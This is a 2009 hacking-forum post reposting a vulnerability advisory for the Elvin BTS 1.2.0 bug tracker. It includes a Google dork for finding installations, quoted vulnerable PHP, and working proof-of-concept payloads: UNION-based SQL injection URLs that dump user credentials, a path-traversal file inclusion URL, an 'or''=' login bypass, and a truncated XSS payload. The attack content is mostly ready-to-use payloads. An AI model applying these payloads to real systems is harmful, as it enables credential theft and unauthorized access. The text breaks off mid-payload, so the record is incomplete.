Multi Ethnic Hacking Group


    Elvin BTS 1.2.0 Multiple Remote Vulnerabilities

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    Elvin BTS 1.2.0 Multiple Remote Vulnerabilities

    Post by Foxi on Wed Jul 08, 2009 4:17 am

    [code:1:f2c4]
    #################################################################################################################
    [+] Elvin BTS 1.2.0 Multiple Remote VUlnerabilities
    [+] Discovered By SirGod
    [+] www.mortal-team.org
    #################################################################################################################

    - script Homepage : http://www.elvinbts.org/
    - Google Dork : Powered by Elvin Bug Tracking Server.

    Elvin BTS suffers from a lot of vunerabilities

    1) SQL Injection
    2) Local File Inclusion
    3) SQL Injection Login Bypass
    4) Cross-Site scripting
    5) Cross-Site Request Forgery
    6) Source Code Disclosure


    ----------------------- 1) SQL Injection -----------------------

    - Vulnerable code is everywhere.I will present only 2 PoC's.

    a) Vulnerable code in show_bug.php

    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    $query_bug = sprintf("SELECT * FROM " .$prefix_db. "_bug WHERE bg_id_pk=" .$_GET['id']. " AND bg_deleted_dt IS NULL");
    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    - PoC

    http://127.0.0.1/[path]/show_bug.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+eb_profile--

    b) Vulnerable code in show_activity.php

    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    $query_activity = sprintf("SELECT * FROM " .$prefix_db. "_activity WHERE ay_bugid_fk=" .$_GET['id']. "");
    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    - PoC

    http://127.0.0.1/[path]/show_activity.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8+from+eb_profile--


    ----------------------- 2) Local File Inclusion -----------------------

    - Vulnerable code in page.php


    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    $filename = "pages/".$_GET['id'];
    ................................................
    if(file_exists($filename)){
    include($filename);
    } else {
    echo "<h2>Sorry page cannot be found!</h2>";
    }
    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    - PoC

    http://127.0.0.1/[path]/page.php?id=../../../../../../BOOTSECT.BAK



    ----------------------- 3) SQL Injection Login Bypass-----------------------

    - Code in login.php ( in login.php is included the vulnerable code)

    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    include(LoadElvinModule('login.ei'));
    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


    - Vulnerable code in inc/login.ei

    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    $query_login = sprintf("SELECT * FROM " .$prefix_db. "_profile WHERE ac_user_vc='" .$_POST['inUser']. "' AND ac_pass_vc='" .$_POST['inPass']. "'");
    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    - PoC

    Login as :

    Username : 'or''='
    Password : 'or''='


    ----------------------- 4) Cross-Site scripting-----------------------

    It's more XSS's in the script,but tired to find them all.

    - Vulnerable code in show_activity.php

    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    <p>Back to bug # <a href="show_bug.php?id=<?php echo $_GET['id']; ?>"><?php echo $_GET['id']; ?></a></a></p>
    ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    - PoC

    http://127.0.0.1/[path]/show_activity.php?id=<script>alert(document

      Current date/time is Sun Sep 24, 2017 5:33 pm